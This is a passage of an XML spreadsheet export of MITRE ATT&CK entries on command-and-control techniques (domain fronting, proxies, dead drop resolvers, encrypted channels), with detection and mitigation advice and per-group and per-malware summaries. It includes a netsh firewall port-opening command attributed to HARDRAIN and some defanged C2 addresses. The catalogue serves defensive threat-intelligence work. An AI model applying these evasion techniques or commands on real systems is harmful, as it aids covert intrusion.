[Ursnif](https://attack.mitre.org/software/S0386) has used encoded data in HTTP URLs for C2.(Citation: ProofPoint Ursnif Aug 2016)	
</t>
  </si>
  <si>
    <t xml:space="preserve">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SSL/TLS Inspection
If it is possible to inspect HTTPS traffic, the captures can be analyzed for connections that appear to be domain fronting.
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used the meek domain fronting plugin for [Tor](https://attack.mitre.org/software/S0183) to hide the destination of C2 traffic.(Citation: Mandiant No Easy Breach)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to accept a value for HTTP Host Header to enable domain fronting.(Citation: Cobalt Strike Manual 4.3 November 2020)
Mythic
[Mythic](https://attack.mitre.org/software/S0699) supports domain fronting via custom request headers.(Citation: Mythc Documentation)	
SMOKEDHAM
[SMOKEDHAM](https://attack.mitre.org/software/S0649) has used a fronted domain to obfuscate its hard-coded C2 server domain.(Citation: FireEye SMOKEDHAM June 2021)
meek
[meek](https://attack.mitre.org/software/S0175) uses Domain Fronting to disguise the destination of network traffic as another server that is hosted in the same Content Delivery Network (CDN) as the intended destination.
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts.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Filter Network Traffic
Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network allow and block lists. It should be noted that this kind of blocking may be circumvented by other techniques like [Domain Fronting](https://attack.mitre.org/techniques/T1090/004).
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific C2 protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)
SSL/TLS Inspection
If it is possible to inspect HTTPS traffic, the captures can be analyzed for connections that appear to be domain fronting.
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used the Cloudflare CDN to proxy C2 traffic.(Citation: Mandiant APT41)
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) installed the open-source rsocx reverse proxy tool on a targeted ESXi appliance.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
Operation Sharpshooter
For [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the threat actors used the ExpressVPN service to hide their location.(Citation: Bleeping Computer Op Sharpshooter March 2019)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used a custom proxy tool called "Agent" which has support for multiple hops.(Citation: FoxIT Wocao December 2019)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used a tool called CLASSFON to covertly proxy network communications.(Citation: FireEye APT41 Aug 2019)
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used frp, ssf, and Venom to establish SOCKS proxy connections.(Citation: RedCanary Mockingbird May 2020)
CopyKittens
[CopyKittens](https://attack.mitre.org/groups/G0052) has used the AirVPN service for operational activity.(Citation: Microsoft POLONIUM June 2022)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) adopted Cloudflare as a proxy for compromised servers.(Citation: TrendMicro EarthLusca 2022)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used the open source reverse proxy tools including FRPC and Go Proxy to establish connections from C2 to local servers.(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: ClearSky Pay2Kitten December 2020)(Citation: Check Point Pay2Key November 2020)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has leverage NordVPN for its egress points when targeting intended victims.(Citation: MSTIC DEV-0537 Mar 2022)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used Fast Reverse Proxy (FRP) for RDP traffic.(Citation: DFIR Phosphorus November 2021)
MoustachedBouncer
[MoustachedBouncer](https://attack.mitre.org/groups/G1019) has used a reverse proxy tool similar to the GitHub repository revsocks.(Citation: MoustachedBouncer ESET August 2023)
POLONIUM
[POLONIUM](https://attack.mitre.org/groups/G1005) has used the AirVPN service for operational activity.(Citation: Microsoft POLONIUM June 2022)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034)'s BCS-server tool can create an internal proxy server to redirect traffic from the adversary-controlled C2 to internal servers which may not be connected to the internet, but are interconnected locally.(Citation: ESET Telebots Dec 2016)	
Turla
[Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have included local UPnP RPC proxies.(Citation: ESET Turla PowerShell May 2019)	
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used compromised devices and customized versions of open source tools  such as Fast Reverse Proxy (FRP), Earthworm, and [Impacket](https://attack.mitre.org/software/S0357) to proxy network traffic.(Citation: Microsoft Volt Typhoon May 2023)(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)
Windigo
[Windigo](https://attack.mitre.org/groups/G0124) has delivered a generic Windows proxy Win32/Glubteta.M. [Windigo](https://attack.mitre.org/groups/G0124) has also used multiple reverse proxy chains as part of their C2 infrastructure.(Citation: ESET Windigo Mar 2014)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has the ability to use a reverse SOCKS proxy module.(Citation: CheckPoint Naikon May 2020)
AuditCred
[AuditCred](https://attack.mitre.org/software/S0347) can utilize proxy for communications.(Citation: TrendMicro Lazarus Nov 2018)
BADCALL
[BADCALL](https://attack.mitre.org/software/S0245) functions as a proxy server between the victim and C2 server.(Citation: US-CERT BADCALL)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can use SOCKS4 and SOCKS5 proxies to connect to actor-controlled C2 servers. [BADHATCH](https://attack.mitre.org/software/S1081) can also emulate a reverse proxy on a compromised machine to connect with actor-controlled C2 servers.(Citation: BitDefender BADHATCH Mar 2021)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has supported use of a proxy server.(Citation: Talos Bisonal Mar 2020)
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) can act as a reverse proxy.(Citation: PaloAlto CardinalRat Apr 2017)
Dridex
[Dridex](https://attack.mitre.org/software/S0384) contains a backconnect module for tunneling network traffic through a victim's computer. Infected computers become part of a P2P botnet that can relay C2 traffic to other infected peers.(Citation: Dell Dridex Oct 2015)(Citation: Checkpoint Dridex Jan 2021) 
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can identify and use configured proxies in a compromised network for C2 communication.(Citation: Bitdefender FunnyDream Campaign November 2020)
Green Lambert
[Green Lambert](https://attack.mitre.org/software/S0690) can use proxies for C2 traffic.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021)
HARDRAIN
[HARDRAIN](https://attack.mitre.org/software/S0246) uses the command &lt;code&gt;cmd.exe /c netsh firewall add portopening TCP 443 "adp"&lt;/code&gt; and makes the victim machine function as a proxy server.(Citation: US-CERT HARDRAIN March 2018)
HOPLIGHT
[HOPLIGHT](https://attack.mitre.org/software/S0376) has multiple proxy options that mask traffic between the malware and the remote operators.(Citation: US-CERT HOPLIGHT Apr 2019)	
HTRAN
[HTRAN](https://attack.mitre.org/software/S0040) can proxy TCP socket connections to obfuscate command and control infrastructure.(Citation: Operation Quantum Entanglement)(Citation: NCSC Joint Report Public Tools)
KEYPLUG
[KEYPLUG](https://attack.mitre.org/software/S1051) has used Cloudflare CDN associated infrastructure to redirect C2 communications to malicious domains.(Citation: Mandiant APT41)
KOCTOPUS
[KOCTOPUS](https://attack.mitre.org/software/S0669) has deployed a modified version of Invoke-Ngrok to expose open local ports to the Internet.(Citation: MalwareBytes LazyScripter Feb 2021)
Kessel
[Kessel](https://attack.mitre.org/software/S0487) can use a proxy during exfiltration if set in the configuration.(Citation: ESET ForSSHe December 2018)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) can implement use of proxies to pivot traffic.(Citation: Red Canary NETWIRE January 2020)
PLEAD
[PLEAD](https://attack.mitre.org/software/S0435) has the ability to proxy network communications.(Citation: JPCert PLEAD Downloader June 2018)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) contains modules that allow for use of proxies in command and control.(Citation: GitHub PoshC2)
QuasarRAT
[QuasarRAT](https://attack.mitre.org/software/S0262) can communicate over a reverse proxy using SOCKS5.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)
RainyDay
[RainyDay](https://attack.mitre.org/software/S0629) can use proxy tools including boost_proxy_client for reverse proxy functionality.(Citation: Bitdefender Naikon April 2021)
Remcos
[Remcos](https://attack.mitre.org/software/S0332) uses the infected hosts as SOCKS5 proxies to allow for tunneling and proxying.(Citation: Riskiq Remcos Jan 2018)
SDBbot
[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use port forwarding to establish a proxy between a target host and C2.(Citation: Proofpoint TA505 October 2019)
Socksbot
[Socksbot](https://attack.mitre.org/software/S0273) can start SOCKS proxy threads.(Citation: TrendMicro Patchwork Dec 2017)
SombRAT
[SombRAT](https://attack.mitre.org/software/S0615) has the ability to use an embedded SOCKS proxy in C2 communications.(Citation: CISA AR21-126A FIVEHANDS May 2021)
TSCookie
[TSCookie](https://attack.mitre.org/software/S0436) has the ability to proxy communications with command and control (C2) servers.(Citation: JPCert BlackTech Malware September 2019)
TYPEFRAME
A [TYPEFRAME](https://attack.mitre.org/software/S0263) variant can force the compromised system to function as a proxy server.(Citation: US-CERT TYPEFRAME June 2018)
Ursnif
[Ursnif](https://attack.mitre.org/software/S0386) has used a peer-to-peer (P2P) network for C2.(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016)
Vasport
[Vasport](https://attack.mitre.org/software/S0207) is capable of tunneling though a proxy.(Citation: Symantec Vasport May 2012)
WarzoneRAT
[WarzoneRAT](https://attack.mitre.org/software/S0670) has the capability to act as a reverse proxy.(Citation: Check Point Warzone Feb 2020)
XTunnel
[XTunnel](https://attack.mitre.org/software/S0117) relays traffic between a C2 server and a victim.(Citation: Crowdstrike DNC June 2016)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) can set up an HTTP or SOCKS proxy.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014) 
jRAT
[jRAT](https://attack.mitre.org/software/S0283) can serve as a SOCKS proxy server.(Citation: Kaspersky Adwind Feb 2016)
netsh
[netsh](https://attack.mitre.org/software/S0108) can be used to set up a proxy tunnel to allow remote host access to an infected host.(Citation: Securelist fileless attacks Feb 2017)
ngrok
[ngrok](https://attack.mitre.org/software/S0508) can be used to proxy connections to machines located behind NAT or firewalls.(Citation: MalwareBytes Ngrok February 2020)(Citation: Zdnet Ngrok September 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts.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Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific C2 protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.(Citation: University of Birmingham C2)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors proxied traffic through multiple infected systems.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used SSH port forwarding capabilities on public-facing systems, and configured at least one instance of [Cobalt Strike](https://attack.mitre.org/software/S0154) to use a network pipe over SMB.(Citation: CrowdStrike StellarParticle January 2022)(Citation: Symantec RAINDROP January 2021)
APT39
[APT39](https://attack.mitre.org/groups/G0087) used custom tools to create SOCK5 and custom protocol proxies between infected hosts.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has utilized a proxy tool to communicate between compromised assets.(Citation: Sygnia Elephant Beetle Jan 2022)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) discovered system proxy settings and used them if available.(Citation: Zscaler Higaisa 2020)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used a compromised router to serve as a proxy between a victim network's corporate and restricted segments.(Citation: Kaspersky ThreatNeedle Feb 2021)
Strider
[Strider](https://attack.mitre.org/groups/G0041) has used local servers with both local network and Internet access to act as internal proxy nodes to exfiltrate data from other parts of the network without direct Internet access.(Citation: Kaspersky ProjectSauron Blog)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has compromised internal network systems to act as a proxy to forward traffic to C2.(Citation: Talos TinyTurla September 2021)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used the built-in [netsh](https://attack.mitre.org/software/S0108) `port proxy` command to create proxies on compromised systems to facilitate access.(Citation: Microsoft Volt Typhoon May 2023)
BACKSPACE
The "ZJ" variant of [BACKSPACE](https://attack.mitre.org/software/S0031) allows "ZJ link" infections with Internet access to relay traffic from "ZJ listen" to a command server.(Citation: FireEye APT30)
CHOPSTICK
[CHOPSTICK](https://attack.mitre.org/software/S0023) used a proxy server between victims and the C2 server.(Citation: ESET Sednit Part 2)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can be configured to have commands relayed over a peer-to-peer network of infected hosts. This can be used to limit the number of egress points, or provide access to a host without direct internet access.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)
Drovorub
[Drovorub](https://attack.mitre.org/software/S0502) can use a port forwarding rule on its agent module to relay network traffic through the client module to a remote host on the same network.(Citation: NSA/FBI Drovorub August 2020)
Duqu
[Duqu](https://attack.mitre.org/software/S0038) can be configured to have commands relayed over a peer-to-peer network of infected hosts if some of the hosts do not have Internet access.(Citation: Symantec W32.Duqu)
FatDuke
[FatDuke](https://attack.mitre.org/software/S0512) can used pipes to connect machines with restricted internet access to remote machines via other infected hosts.(Citation: ESET Dukes October 2019)
Hikit
[Hikit](https://attack.mitre.org/software/S0009) supports peer connections.(Citation: Novetta-Axiom)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can function as a proxy to create a server that relays communication between the client and C&amp;C server, or between two clients.(Citation: ESET InvisiMole June 2018)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) has used internal nodes on the compromised network for C2 communications.(Citation: Accenture HyperStack October 2020)
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can create a named pipe to listen for and send data to a named pipe-based C2 server.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
MiniDuke
[MiniDuke](https://attack.mitre.org/software/S0051) can can use a named pipe to forward communications from one compromised machine with internet access to other compromised machines.(Citation: ESET Dukes October 2019)
Mythic
[Mythic](https://attack.mitre.org/software/S0699) can leverage a peer-to-peer C2 profile between agents.(Citation: Mythc Documentation)		
Pay2Key
[Pay2Key](https://attack.mitre.org/software/S0556) has designated machines in the compromised network to serve as reverse proxy pivot points to channel communications with C2.(Citation: ClearkSky Fox Kitten February 2020)(Citation: Check Point Pay2Key November 2020)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) installs an RPC server for P2P communications.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Winnti for Windows
The [Winnti for Windows](https://attack.mitre.org/software/S0141) HTTP/S C2 mode can make use of a local proxy.(Citation: Novetta Winnti April 2015)
metaMain
[metaMain](https://attack.mitre.org/software/S1059) can create a named pipe to listen for and send data to a named pipe-based C2 server.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts. 
Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.
APT3
An [APT3](https://attack.mitre.org/groups/G0022) downloader first establishes a SOCKS5 connection to 192.157.198[.]103 using TCP port 1913; once the server response is verified, it then requests a connection to 192.184.60[.]229 on TCP port 81.(Citation: FireEye Operation Double Tap)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.(Citation: FireEye APT41 March 2020)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used multi-stage malware components that inject later stages into separate processes.(Citation: Lazarus APT January 2022)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.(Citation: Talos MuddyWater May 2019) 
BACKSPACE
[BACKSPACE](https://attack.mitre.org/software/S0031) attempts to avoid detection by checking a first stage command and control server to determine if it should connect to the second stage server, which performs "louder" interactions with the malware.(Citation: FireEye APT30)
BLACKCOFFEE
[BLACKCOFFEE](https://attack.mitre.org/software/S0069) uses Microsoft’s TechNet Web portal to obtain an encoded tag containing the IP address of a command and control server and then communicates separately with that IP address for C2. If the C2 server is discovered or shut down, the threat actors can update the encoded IP address on TechNet to maintain control of the victims’ machines.(Citation: FireEye APT17)
Bazar
The [Bazar](https://attack.mitre.org/software/S0534) loader is used to download and execute the [Bazar](https://attack.mitre.org/software/S0534) backdoor.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)
Chaos
After initial compromise, [Chaos](https://attack.mitre.org/software/S0220) will download a second stage to establish a more permanent presence on the affected system.(Citation: Chaos Stolen Backdoor)
Snip3
[Snip3](https://attack.mitre.org/software/S1086) can download and execute additional payloads and modules over separate communication channels.(Citation: Morphisec Snip3 May 2021)(Citation: Telefonica Snip3 December 2021)
Uroburos
Individual [Uroburos](https://attack.mitre.org/software/S0022) implants can use multiple communication channels based on one of four available modes of operation.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
Valak
[Valak](https://attack.mitre.org/software/S0476) can download additional modules and malware capable of using separate C2 channels.(Citation: Unit 42 Valak July 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts.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Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific C2 protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.(Citation: University of Birmingham C2)
APT28
[APT28](https://attack.mitre.org/groups/G0007) used other victims as proxies to relay command traffic, for instance using a compromised Georgian military email server as a hop point to NATO victims. The group has also used a tool that acts as a proxy to allow C2 even if the victim is behind a router. [APT28](https://attack.mitre.org/groups/G0007) has also used a machine to relay and obscure communications between [CHOPSTICK](https://attack.mitre.org/software/S0023) and their server.(Citation: FireEye APT28)(Citation: Bitdefender APT28 Dec 2015)(Citation: DOJ GRU Indictment Jul 2018)
APT3
An [APT3](https://attack.mitre.org/groups/G0022) downloader establishes SOCKS5 connections for its initial C2.(Citation: FireEye Operation Double Tap)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used various tools to proxy C2 communications.(Citation: BitDefender Chafer May 2020)
FIN5
[FIN5](https://attack.mitre.org/groups/G0053) maintains access to victim environments by using [FLIPSIDE](https://attack.mitre.org/software/S0173) to create a proxy for a backup RDP tunnel.(Citation: Mandiant FIN5 GrrCON Oct 2016)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) used a modified version of [HTRAN](https://attack.mitre.org/software/S0040) to redirect connections between networks.(Citation: Cybereason Soft Cell June 2019)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used multiple proxies to obfuscate network traffic from victims.(Citation: US-CERT FALLCHILL Nov 2017)(Citation: TrendMicro macOS Dacls May 2020)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has controlled [POWERSTATS](https://attack.mitre.org/software/S0223) from behind a proxy network to obfuscate the C2 location.(Citation: Symantec MuddyWater Dec 2018) [MuddyWater](https://attack.mitre.org/groups/G0069) has used a series of compromised websites that victims connected to randomly to relay information to command and control (C2).(Citation: Reaqta MuddyWater November 2017)(Citation: Trend Micro Muddy Water March 2021)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has used ProxyBot, which allows the attacker to redirect traffic from the current node to the backconnect server via Sock4\Socks5.(Citation: Group IB Silence Sept 2018)	
Tonto Team
[Tonto Team](https://attack.mitre.org/groups/G0131) has routed their traffic through an external server in order to obfuscate their location.(Citation: TrendMicro Tonto Team October 2020)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used a global service provider's IP as a proxy for C2 traffic from a victim.(Citation: FireEye APT10 April 2017)(Citation: FireEye APT10 Sept 2018)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) InvisiMole can identify proxy servers used by the victim and use them for C2 communication.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)
Mythic
[Mythic](https://attack.mitre.org/software/S0699) can leverage a modified SOCKS5 proxy to tunnel egress C2 traffic.(Citation: Mythc Documentation)
Okrum
[Okrum](https://attack.mitre.org/software/S0439) can identify proxy servers configured and used by the victim, and use it to make HTTP requests to C2 its server.(Citation: ESET Okrum July 2019)
POWERSTATS
[POWERSTATS](https://attack.mitre.org/software/S0223) has connected to C2 servers through proxies.(Citation: FireEye MuddyWater Mar 2018)
QUIETEXIT
[QUIETEXIT](https://attack.mitre.org/software/S1084) can proxy traffic via SOCKS.(Citation: Mandiant APT29 Eye Spy Email Nov 22)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) has a module that can proxy C2 communications.(Citation: Kaspersky QakBot September 2021)
Regin
[Regin](https://attack.mitre.org/software/S0019) leveraged several compromised universities as proxies to obscure its origin.(Citation: Kaspersky Regin)
ShimRat
[ShimRat](https://attack.mitre.org/software/S0444) can use pre-configured HTTP proxies.(Citation: FOX-IT May 2016 Mofang)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) has been known to reach a command and control server via one of nine proxy IP addresses. (Citation: Bitdefender Trickbot C2 infra Nov 2020) (Citation: Bitdefender Trickbot VNC module Whitepaper 2021)
Winnti for Windows
The [Winnti for Windows](https://attack.mitre.org/software/S0141) HTTP/S C2 mode can make use of an external proxy.(Citation: Novetta Winnti April 2015)
</t>
  </si>
  <si>
    <t xml:space="preserve">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Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.
Restrict Web-Based Content
Web proxies can be used to enforce external network communication policy that prevents use of unauthorized external services.
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used dead drop resolvers on two separate tech community forums for their [KEYPLUG](https://attack.mitre.org/software/S1051) Windows-version backdoor; notably [APT41](https://attack.mitre.org/groups/G0096) updated the community forum posts frequently with new dead drop resolvers during the campaign.(Citation: Mandiant APT41)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used legitimate websites for C2 through dead drop resolvers (DDR), including GitHub, Pastebin, and Microsoft TechNet.(Citation: FireEye APT41 Aug 2019)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060)'s MSGET downloader uses a dead drop resolver to access malicious payloads.(Citation: Secureworks BRONZE BUTLER Oct 2017)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) hides base64-encoded and encrypted C2 server locations in comments on legitimate websites.(Citation: Securelist Dropping Elephant)
RTM
[RTM](https://attack.mitre.org/groups/G0048) has used an RSS feed on Livejournal to update a list of encrypted C2 server names.(Citation: ESET RTM Feb 2017)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) has used Pastebin to check the version of beaconing malware and redirect to another Pastebin hosting updated malware.(Citation: Anomali Rocke March 2019)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) can store C2 information on cloud hosting services such as AWS and CloudFlare and websites like YouTube and Facebook.(Citation: Securelist Brazilian Banking Malware July 2020)
BADNEWS
[BADNEWS](https://attack.mitre.org/software/S0128) collects C2 information via a dead drop resolver.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)
BLACKCOFFEE
[BLACKCOFFEE](https://attack.mitre.org/software/S0069) uses Microsoft’s TechNet Web portal to obtain a dead drop resolver containing an encoded tag with the IP address of a command and control server.(Citation: FireEye APT17)(Citation: FireEye Periscope March 2018)
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) can retrieve C2 domain information from actor-controlled S3 buckets.(Citation: Check Point APT35 CharmPower January 2022)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can obtain C2 information from Google Docs.(Citation: Securelist Brazilian Banking Malware July 2020)
Javali
[Javali](https://attack.mitre.org/software/S0528) can read C2 information from Google Documents and YouTube.(Citation: Securelist Brazilian Banking Malware July 2020)
KEYPLUG
The [KEYPLUG](https://attack.mitre.org/software/S1051) Windows variant has retrieved C2 addresses from encoded data in posts on tech community forums.(Citation: Mandiant APT41)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has used YouTube to store and hide C&amp;C server domains.(Citation: ESET Casbaneiro Oct 2019)
MiniDuke
Some [MiniDuke](https://attack.mitre.org/software/S0051) components use Twitter to initially obtain the address of a C2 server or as a backup if no hard-coded C2 server responds.(Citation: F-Secure The Dukes)(Citation: Securelist MiniDuke Feb 2013)(Citation: ESET Dukes October 2019)
PlugX
[PlugX](https://attack.mitre.org/software/S0013) uses Pastebin to store C2 addresses.(Citation: Palo Alto PlugX June 2017)
PolyglotDuke
[PolyglotDuke](https://attack.mitre.org/software/S0518) can use Twitter, Reddit, Imgur and other websites to get a C2 URL.(Citation: ESET Dukes October 2019)
RTM
[RTM](https://attack.mitre.org/software/S0148) has used an RSS feed on Livejournal to update a list of encrypted C2 server names. [RTM](https://attack.mitre.org/software/S0148) has also hidden [Pony](https://attack.mitre.org/software/S0453) C2 server IP addresses within transactions on the Bitcoin and Namecoin blockchain.(Citation: ESET RTM Feb 2017)(Citation: CheckPoint Redaman October 2019)(Citation: Unit42 Redaman January 2019)
Xbash
[Xbash](https://attack.mitre.org/software/S0341) can obtain a webpage hosted on Pastebin to update its C2 domain list.(Citation: Unit42 Xbash Sept 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">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Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.
SSL/TLS Inspection
SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols.
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used multiple layers of encryption within malware to protect C2 communication.(Citation: Secureworks IRON HEMLOCK Profile)
BITTER
[BITTER](https://attack.mitre.org/groups/G1002) has encrypted their C2 communications.(Citation: Forcepoint BITTER Pakistan Oct 2016)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used an encrypted http proxy in C2 communications.(Citation: DFIR Phosphorus November 2021)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has encrypted traffic with the C2 to prevent network detection.(Citation: TrendMicro Tropic Trooper May 2020)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) has used encryption for its C2 channel.(Citation: Cybereason Chaes Nov 2020) 
Cryptoistic
[Cryptoistic](https://attack.mitre.org/software/S0498) can engage in encrypted communications with C2.(Citation: SentinelOne Lazarus macOS July 2020)
Lizar
[Lizar](https://attack.mitre.org/software/S0681) can support encrypted communications between the client and server.(Citation: Threatpost Lizar May 2021)(Citation: BiZone Lizar May 2021)
MacMa
[MacMa](https://attack.mitre.org/software/S1016) has used TLS encryption to initialize a custom protocol for C2 communications.(Citation: ESET DazzleSpy Jan 2022)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) can encrypt C2 communications.(Citation: Red Canary NETWIRE January 2020)
PowGoop
[PowGoop](https://attack.mitre.org/software/S1046) can receive encrypted commands from C2.(Citation: DHS CISA AA22-055A MuddyWater February 2022)
PowerLess
[PowerLess](https://attack.mitre.org/software/S1012) can use an encrypted channel for C2 communications.(Citation: Cybereason PowerLess February 2022)
RCSession
[RCSession](https://attack.mitre.org/software/S0662) can use an encrypted beacon to check in with C2.(Citation: Secureworks BRONZE PRESIDENT December 2019)
gh0st RAT
[gh0st RAT](https://attack.mitre.org/software/S0032) has encrypted TCP communications to evade detection.(Citation: Gh0stRAT ATT March 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor for newly created files that may be used to register malicious network provider dynamic link libraries (DLLs).
OS API Execution
Monitor for abnormal API calls to `NPLogonNotify()`.(Citation: NPLogonNotify)
Windows Registry Key Creation
Monitor for the addition of network provider Registry keys (e.g., `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\&lt;NetworkProviderName&gt;\NetworkProvider`).
Windows Registry Key Modification
Monitor for changes to Registry entries for network providers (e.g., `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order`) and correlate then investigate the DLL files these values reference.
Audit
Periodically review for new and unknown network provider DLLs within the Registry (`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\&lt;NetworkProviderName&gt;\NetworkProvider\ProviderPath`).
Ensure only valid network provider DLLs are registered. The name of these can be found in the Registry key at `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order`, and have corresponding service subkey pointing to a DLL at `HKEY_LOCAL_MACHINE\SYSTEM\CurrentC ontrolSet\Services\&lt;NetworkProviderName&gt;\NetworkProvider`.
Operating System Configuration
